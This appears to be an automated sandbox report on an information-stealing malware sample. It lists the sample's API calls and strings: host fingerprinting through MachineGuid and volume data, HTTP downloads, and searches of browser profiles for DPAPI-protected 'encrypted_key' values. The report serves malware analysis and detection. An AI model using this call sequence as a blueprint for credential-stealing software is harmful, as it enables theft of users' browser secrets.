GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004111AE
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004111E0
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411223
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0041122A
wsprintfA.USER32 ref: 00411256
lstrcat.KERNEL32(00000000,00427328), ref: 00411265

Part of subcall function 0041114B: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041115C

lstrlenA.KERNEL32(00000000), ref: 00411284

Part of subcall function 00411DFD: malloc.MSVCRT ref: 00411E0B
Part of subcall function 00411DFD: strncpy.MSVCRT ref: 00411E1B

lstrcat.KERNEL32(00000000,00000000), ref: 004112B1

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Strings

:\, xrefs: 004111D6
C, xrefs: 004111B8

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 688099012-3309953409
Opcode ID: 8cc47a6b0af978dea093181657003bf62370719246e7e65388f64311e0dd353c
Instruction ID: e7e94bf72c675f1c287aeb3f90771ab053eef56abc6df49fd5bae935c425ffca
Opcode Fuzzy Hash: 8cc47a6b0af978dea093181657003bf62370719246e7e65388f64311e0dd353c
Instruction Fuzzy Hash: C341ED71801158AACB11EBE5DD88DEFBBBDEF4A304F10006EF615A3111DB384B88CB69

Function 00413D3B Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413D40

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413DC2
lstrlenA.KERNEL32(00000000), ref: 00413DD9

Part of subcall function 00411A16: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413DEE,00000000,00000000), ref: 00411A2F

StrStrA.SHLWAPI(00000000,00000000), ref: 00413E00
lstrlenA.KERNEL32(00000000), ref: 00413E15
lstrlenA.KERNEL32(00000000), ref: 00413E30

Strings

ERROR, xrefs: 00413E5B
ERROR, xrefs: 00413E54
ERROR, xrefs: 00413E62
ERROR, xrefs: 00413DB4
ERROR, xrefs: 00413E40

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3807055897-1526165396
Opcode ID: 5ef121b7aea4581f9dc9a047ab7cc854c2bb7527d19ee895acc0f6f396dc76cb
Instruction ID: 84879e7cc72f0b7f90800a24ecb98b776d8c9fcf7a6c22dfe034105e63e75272
Opcode Fuzzy Hash: 5ef121b7aea4581f9dc9a047ab7cc854c2bb7527d19ee895acc0f6f396dc76cb
Instruction Fuzzy Hash: 0241A571905255EACB10EFB5D946BEE7BB8AF14304F10405FF90563181DFBC5B88CA69

Function 0040F84C Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 373COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F851
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F895
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F909
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FA25

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 0040DF3B: _EH_prolog.MSVCRT ref: 0040DF40

Part of subcall function 0040C3F1: _EH_prolog.MSVCRT ref: 0040C3F6

StrCmpCA.SHLWAPI(00000000), ref: 0040FAF4
StrCmpCA.SHLWAPI(00000000), ref: 0040FB69
StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040FC84

Strings

firefox, xrefs: 0040FC76
Stable\, xrefs: 0040F94C
Stable\, xrefs: 0040FBAC

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 2120869262-2697854757
Opcode ID: 691ef408569b55dfa5291e97b9f17a845f177eef25f96296a65fe725b49905b5
Instruction ID: 3eb1228ffb4cf24498e1f39ae34646ef210bdaab021b29e0e7a63f6bdb077fa1
Opcode Fuzzy Hash: 691ef408569b55dfa5291e97b9f17a845f177eef25f96296a65fe725b49905b5
Instruction Fuzzy Hash: B4E1B571D00248EADF10FBB9D956BDE7FB4AF15304F10405EE844A7282DB781798CBA6

Function 00404DCA Relevance: 15.1, APIs: 10, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00404DCF

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
StrCmpCA.SHLWAPI(?), ref: 00404E38
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
InternetCloseHandle.WININET(00000000), ref: 00404EE9
InternetCloseHandle.WININET(?), ref: 00404EF2

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2737972104-0
Opcode ID: 5e6fba93ca7e1355e509bebff188e2a457f566f651e7010fd3fae48142be1020
Instruction ID: ab2fc4674511ac693909d30ff12a069bbcc860e535eb395644b56ae737ea4132
Opcode Fuzzy Hash: 5e6fba93ca7e1355e509bebff188e2a457f566f651e7010fd3fae48142be1020
Instruction Fuzzy Hash: 15416AB1900119AFDB20EFA0DD85EEF7BBDFB45304F10402AFA15E6191DB785A85CBA4

Function 00417C41 Relevance: 11.2, APIs: 5, Strings: 1, Instructions: 695networksleepCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417C46

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00414120: _EH_prolog.MSVCRT ref: 00414125

Part of subcall function 004141CF: _EH_prolog.MSVCRT ref: 004141D4

Part of subcall function 00410640: lstrlenA.KERNEL32(?,00000000,?,00417C9B,0042771F,0042771E,00000000,00000000,?,0041867E), ref: 00410649
Part of subcall function 00410640: lstrcpy.KERNEL32(00000000,00000000), ref: 0041067D

Part of subcall function 004189AF: GetProcAddress.KERNEL32(74DD0000,00417DAF), ref: 004189C3
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 004189DA
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 004189F1
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A08
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A1F
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A36
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A4D
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A64
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A7B
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418A92
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418AA9
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418AC0
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418AD7
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418AEE
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B05
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B1C
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B33
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B4A
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B61
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B78
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418B8F
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418BA6
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418BBD
Part of subcall function 004189AF: GetProcAddress.KERNEL32 ref: 00418BD4

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000034,0041420C,0041867E,00427723,00000000,?,00000034,00000032,004142D6,0041246C,?,00000040,00000064), ref: 00417E58

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414BED: _EH_prolog.MSVCRT ref: 00414BF2
Part of subcall function 00414BED: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3F

Part of subcall function 00413EB8: _EH_prolog.MSVCRT ref: 00413EBD

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417F3D
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00417F59

Part of subcall function 00411186: _EH_prolog.MSVCRT ref: 0041118B
Part of subcall function 00411186: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004111AE
Part of subcall function 00411186: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004111E0
Part of subcall function 00411186: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411223
Part of subcall function 00411186: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0041122A

Part of subcall function 00403AF5: _EH_prolog.MSVCRT ref: 00403AFA
Part of subcall function 00403AF5: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
Part of subcall function 00403AF5: StrCmpCA.SHLWAPI(?), ref: 00403BBC

Part of subcall function 00412DE2: _EH_prolog.MSVCRT ref: 00412DE7
Part of subcall function 00412DE2: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00417FDD), ref: 00412E09
Part of subcall function 00412DE2: ExitProcess.KERNEL32 ref: 00412E14

Part of subcall function 0040F84C: _EH_prolog.MSVCRT ref: 0040F851
Part of subcall function 0040F84C: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F895
Part of subcall function 0040F84C: StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F909

Part of subcall function 00405C89: _EH_prolog.MSVCRT ref: 00405C8E
Part of subcall function 00405C89: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D39
Part of subcall function 00405C89: StrCmpCA.SHLWAPI(?), ref: 00405D50

Part of subcall function 004128CE: _EH_prolog.MSVCRT ref: 004128D3
Part of subcall function 004128CE: strtok_s.MSVCRT ref: 004128FA
Part of subcall function 004128CE: StrCmpCA.SHLWAPI(00000000,004276FC,?,?,?,?,004181C7), ref: 0041292B
Part of subcall function 004128CE: strtok_s.MSVCRT ref: 0041298C

Part of subcall function 00401ED6: _EH_prolog.MSVCRT ref: 00401EDB

Part of subcall function 0041740F: _EH_prolog.MSVCRT ref: 00417414
Part of subcall function 0041740F: lstrcat.KERNEL32(?,?), ref: 0041746A
Part of subcall function 0041740F: lstrcat.KERNEL32(?,00000000), ref: 00417490
Part of subcall function 0041740F: lstrcat.KERNEL32(?,?), ref: 004174B0
Part of subcall function 0041740F: lstrcat.KERNEL32(?,?), ref: 004174C4
Part of subcall function 0041740F: lstrcat.KERNEL32(?), ref: 004174D7
Part of subcall function 0041740F: lstrcat.KERNEL32(?,?), ref: 004174EB
Part of subcall function 0041740F: lstrcat.KERNEL32(?), ref: 004174FE

Part of subcall function 004178BB: _EH_prolog.MSVCRT ref: 004178C0
Part of subcall function 004178BB: lstrcat.KERNEL32(?,00000000), ref: 00417902
Part of subcall function 004178BB: lstrcat.KERNEL32(?), ref: 00417921

Sleep.KERNEL32(000003E8), ref: 004183A2

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

l$A, xrefs: 00417DE3, 00417DF8, 00417E21, 00417E4C

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$H_prolog$lstrcat$lstrcpy$InternetOpen$DirectoryHeapProcesslstrlenstrtok_s$AllocCreateExitInformationSleepSystemTimeVolumeWindows
String ID: l$A
API String ID: 1785958601-1321171958
Opcode ID: 6537614cba487c1e55caccd9a04751c0683dac7682ee4a74ef74a2447041eeaf
Instruction ID: bdabcc2971026e41216f7ba951f3b273f2f73ca5a775bb739a0e8693ccb92bf2
Opcode Fuzzy Hash: 6537614cba487c1e55caccd9a04751c0683dac7682ee4a74ef74a2447041eeaf
Instruction Fuzzy Hash: 73424371D40358AADF10EBA5CD56BDEBBB8AB55304F10419EF50473281DBB81B88CBA7

Function 0040CCC8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040CCCD

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411A16: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413DEE,00000000,00000000), ref: 00411A2F

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040CD1F

Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
Part of subcall function 00406D7F: LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
Part of subcall function 00406D7F: LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2

memcmp.MSVCRT ref: 0040CD5D

Part of subcall function 00406DE2: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406E05
Part of subcall function 00406DE2: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406E1D
Part of subcall function 00406DE2: LocalFree.KERNEL32(?), ref: 00406E3B

Strings

, xrefs: 0040CD88
"encrypted_key":", xrefs: 0040CD19
DPAPI, xrefs: 0040CD57

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeH_prologString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 2477620391-738592651
Opcode ID: 38f421246f75479806700c7ec13760197cb21874f2444637347fbd938b1230cd
Instruction ID: b18f52fa2ab6349929eba5f85fdfe36c17d9ec2bbaba99bf5b810eb35a9e6beb
Opcode Fuzzy Hash: 38f421246f75479806700c7ec13760197cb21874f2444637347fbd938b1230cd
Instruction Fuzzy Hash: 7B21B6B2D00115ABCF11ABA5CC42AEF7F78DF40310F54023BF912F22D1E739AA558699

Function 00406CC8 Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406CCD
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D53
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
String ID:
API String ID: 3869837436-0
Opcode ID: 09932d13d583609c1c79854498f46ae9464800db6b62acb59a644a64c5d431c3
Instruction ID: 789f3faba181f063824a30762941bf86dd1d92ababa6028e3c04d20920bdb07f
Opcode Fuzzy Hash: 09932d13d583609c1c79854498f46ae9464800db6b62acb59a644a64c5d431c3
Instruction Fuzzy Hash: E1219F74A00115EFDB20AF64CC89EAFBB7AEF45310F10052AF922E62E0D7749951CB64

Function 004110BE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004110E4
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004275FA,?,?,00000000), ref: 00411100
RegQueryValueExA.KERNEL32(004275FA,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041111F
CharToOemA.USER32(?,?), ref: 0041113C

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 004110F6
MachineGuid, xrefs: 00411117

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-1211650757
Opcode ID: fa5a9eae4373164c61e21b24a16554dd5719a8fb09a8e3c4c74b915f245b7c0c
Instruction ID: bac6031634e0c909d173dd7c2d5c51f929a4c36a5a28b04cd5e1bd94f2af2fe8
Opcode Fuzzy Hash: fa5a9eae4373164c61e21b24a16554dd5719a8fb09a8e3c4c74b915f245b7c0c
